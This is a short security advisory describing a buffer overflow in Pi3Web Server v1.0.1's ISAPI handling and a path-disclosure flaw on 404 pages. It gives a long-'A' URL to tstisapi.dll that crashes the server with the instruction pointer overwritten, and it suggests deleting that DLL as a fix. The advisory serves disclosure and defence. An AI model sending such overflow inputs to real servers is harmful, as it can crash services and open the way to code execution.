COMMAND

    Pi3Web Server

SYSTEMS AFFECTED

    Pi3Web Server v1.0.1

PROBLEM

    Joe Testa  found following.   Pi3Web v1.0.1  is a  web server.   A
    vulnerability  exists  in  the  server's  internal  ISAPI handling
    procedures which results  in a buffer  overflow.  The  server also
    reveals the physical path of the web root upon encountering a  404
    error.

    Here  is  an  example  URL  that  overflows  a  buffer in Pi3Web's
    executable:

        http://localhost/isapi/tstisapi.dll?[a lot of 'A's]

    This results in the following crash:

        ENHPI3 caused an invalid page fault in
        module <unknown> at 0000:41414141.
        Registers:
        EAX=00000001 CS=017f EIP=41414141 EFLGS=00010206
        EBX=0123d1b0 SS=0187 ESP=041df3b0 EBP=041dfed4
        ECX=00000000 DS=0187 ESI=041df3f0 FS=3e6f
        EDX=00000000 ES=0187 EDI=00000000 GS=0000
        Bytes at CS:EIP:
        
        Stack dump:
        41414141 41414141 41414141 41414141
        41414141 41414141 41414141 41414141
        41414141 41414141 41414141 41414141
        41414141 00bb0b2c 00000000 05611030

    To discover the physical path of the web root:

        http://localhost/[any string which causes a 404 error]

    The server responds with:

        The original URL path was:
        /sadfasdf
        
        The mapped physical path was:
        C:\PI3WEB\WebRoot\sadfasdf

SOLUTION

    The buffer overflow can be prevented by deleting the ISAPI  module
    named 'tstisapi.dll'.   There is  no quick  solution for  the  web
    root disclosure.  The author, John Roy, was contacted on  February
    5, 2001.  No reply was received.